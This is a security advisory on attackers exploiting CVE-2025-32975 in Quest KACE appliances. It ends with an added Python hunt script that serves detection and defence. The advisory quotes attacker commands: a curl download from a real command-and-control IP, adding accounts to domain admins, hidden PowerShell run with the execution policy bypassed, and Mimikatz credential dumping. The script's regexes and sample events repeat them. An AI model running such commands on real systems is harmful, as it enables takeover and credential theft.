
Critical Vulnerability CVE-2025-32975 Exploited in Quest KACE Systems

🚨 Starting the week of March 9, 2026, Arctic Wolf observed malicious activity in customer environments potentially linked to the exploitation of CVE-2025-32975 on unpatched Quest KACE Systems Management Appliance (SMA) instances that were publicly exposed to the internet. This vulnerability was patched in May 2025.

Quest KACE SMA is an on-premises appliance for centralized endpoint management, providing inventory, software deployment, patching, and endpoint monitoring. CVE-2025-32975 is a critical authentication bypass in the appliance's SSO authentication handling that allows a threat actor to impersonate a legitimate user without valid credentials, which can result in complete administrative takeover. Beyond the activity described below, Arctic Wolf is not aware of any public reports of exploitation of CVE-2025-32975 and has not identified a publicly available proof-of-concept.

Observed Malicious Activity

Initial access is suspected to have occurred via CVE-2025-32975, since the threat actors achieved administrative takeover shortly after the first observed activity. Observed activity included the following:

  • Abused the KPluginRunProcess functionality in KACE to execute commands remotely.
  • Analysis of KACE logs revealed Base64-encoded payloads.
  • Downloaded files with curl from 216.126.225.156 to establish command-and-control communication.
  • For persistence, threat actors created additional administrative accounts via runkbot.exe (a Quest KACE process) and attempted to add them to administrative groups using commands such as net localgroup administrators ooo1 /add and net group "domain admins" ooo2 /add.
  • Attackers also executed PowerShell scripts with the execution policy bypassed and the window hidden, specifically powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\temp\Enable-UpdateServices.ps1".
  • Registry modifications via taskband.ps1 were observed, likely for persistence or system configuration changes.

Credential Harvesting

Credential harvesting was performed using Mimikatz, including one instance disguised as asd.exe. Local system enumeration included:

  • quser.exe to enumerate logged-in users.
  • net localgroup administrators to list admin accounts.
  • net user to enumerate all user accounts.

Domain administrative structure enumeration involved:

  • net group "domain admins" /domain > c:\1.txt
  • net group "domain controllers" /domain >> c:\1.txt

Network and domain discovery was conducted using:

  • net time /domain > c:\1.txt
  • net group "domain controllers" /domain
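As an added example (not code from the advisory, from Arctic Wolf, or from Quest), the following Python hunt script turns the command lines quoted in the Observed Malicious Activity and Credential Harvesting sections into rules and runs them over constructed sample process-creation events and KACE-style log lines, including decoding the Base64 payloads the advisory mentions. The event field names, the log line format, the curl URL path, and the Mimikatz arguments are assumptions; the only rule not taken from the advisory is the standard Mimikatz `module::command` syntax.

```python
import base64
import re

# Process-creation events constructed for this example to mirror the commands
# quoted in the advisory. Field names (host/parent/image/cmd) are an assumption,
# loosely modelled on Sysmon Event ID 1 / Security 4688.
SAMPLE_EVENTS = [
    {"host": "srv01", "parent": "runkbot.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c net localgroup administrators ooo1 /add"},
    {"host": "srv01", "parent": "runkbot.exe", "image": "cmd.exe",
     "cmd": 'cmd.exe /c net group "domain admins" ooo2 /add'},
    {"host": "srv01", "parent": "runkbot.exe", "image": "powershell.exe",
     "cmd": 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden '
            '-File "C:\\temp\\Enable-UpdateServices.ps1"'},
    {"host": "srv01", "parent": "cmd.exe", "image": "curl.exe",
     "cmd": "curl -o C:\\temp\\x http://216.126.225.156/x"},  # URL path assumed
    {"host": "srv01", "parent": "cmd.exe", "image": "net.exe",
     "cmd": 'net group "domain admins" /domain > c:\\1.txt'},
    {"host": "srv01", "parent": "cmd.exe", "image": "quser.exe", "cmd": "quser.exe"},
    {"host": "srv01", "parent": "cmd.exe", "image": "asd.exe",
     "cmd": 'asd.exe "sekurlsa::logonpasswords" exit'},  # Mimikatz arguments assumed
    {"host": "ws07", "parent": "explorer.exe", "image": "net.exe",
     "cmd": "net use Z: \\\\fileserver\\share"},  # benign, must not fire
]

# Constructed KACE-style log lines carrying Base64 payloads (illustrative format,
# not the real KACE log format). The second payload is UTF-16LE, the encoding
# PowerShell's -EncodedCommand expects.
_B64_ASCII = base64.b64encode(
    b'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\\temp\\taskband.ps1"'
).decode()
_B64_UTF16 = base64.b64encode("net user".encode("utf-16-le")).decode()
SAMPLE_KACE_LOGS = [
    f"2026-03-10T04:12:03Z KPluginRunProcess host=srv01 payload={_B64_ASCII}",
    f"2026-03-10T04:12:09Z KPluginRunProcess host=srv01 payload={_B64_UTF16}",
]

# One rule per behaviour quoted in the advisory, plus Mimikatz module syntax.
RULES = [
    ("admin_group_add", re.compile(
        r'\bnet(?:1)?(?:\.exe)?\s+(?:localgroup\s+administrators|group\s+"?domain admins"?)'
        r'\s+\S+\s+/add\b', re.I)),
    ("powershell_bypass_hidden", re.compile(
        r'powershell(?:\.exe)?(?=.*-ExecutionPolicy\s+Bypass)(?=.*-WindowStyle\s+Hidden).*-File\b',
        re.I)),
    ("curl_to_c2_ip", re.compile(r'\bcurl(?:\.exe)?\b.*\b216\.126\.225\.156\b', re.I)),
    ("domain_enum_to_file", re.compile(
        r'\bnet(?:\.exe)?\s+(?:group\s+"domain (?:admins|controllers)"|time)\s+/domain\b'
        r'.*>>?\s*c:\\1\.txt', re.I)),
    ("local_enum", re.compile(
        r'^(?:quser(?:\.exe)?|net(?:\.exe)?\s+user|net(?:\.exe)?\s+localgroup\s+administrators)\s*$',
        re.I)),
    ("mimikatz_module_syntax", re.compile(r'\b(?:sekurlsa|lsadump|privilege)::', re.I)),
]
KACE_AGENT = "runkbot.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe"}
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def decode_base64_payloads(text):
    """Decode Base64 tokens that yield printable text (UTF-8, then UTF-16LE).
    Ordinary words such as KPluginRunProcess fail validation and are skipped."""
    out = []
    for tok in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if s and all(c.isprintable() or c in "\r\n\t" for c in s):
                out.append(s)
                break
    return out


def hunt(events):
    """(host, image, [rule names]) for every event that trips a rule. A shell or
    net.exe under runkbot.exe is flagged too; the agent legitimately runs deployed
    scripts, so treat that hit as a pivot point rather than an alert on its own."""
    findings = []
    for ev in events:
        hits = match_rules(ev["cmd"])
        if ev["parent"].lower() == KACE_AGENT and ev["image"].lower() in SHELLS:
            hits.append("kace_agent_spawned_shell")
        if hits:
            findings.append((ev["host"], ev["image"], hits))
    return findings


if __name__ == "__main__":
    for host, image, hits in hunt(SAMPLE_EVENTS):
        print(f"{host} {image}: {', '.join(hits)}")
    for line in SAMPLE_KACE_LOGS:
        for payload in decode_base64_payloads(line):
            print(f"decoded payload {payload!r} -> {match_rules(payload)}")
```

Decoded payloads are fed back through the same rules, so a Base64-wrapped `powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File` in a KACE log fires the same rule as the plain command line would. When adapting this to real telemetry, replace the constructed event list with your process-creation source and expect the runkbot.exe parent rule to need tuning for legitimate KACE deployments.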

Lateral movement included gaining RDP access to backup infrastructure (Veeam, Veritas) and domain controllers.

Recommendations

Arctic Wolf strongly recommends that customers upgrade KACE SMA to the latest fixed version. Additionally, Arctic Wolf strongly recommends that KACE SMA instances not be exposed to the public internet. If remote access is required, it should be restricted through a VPN or firewall.

For more details, read the full article.

This post is licensed under CC BY 4.0 by the author.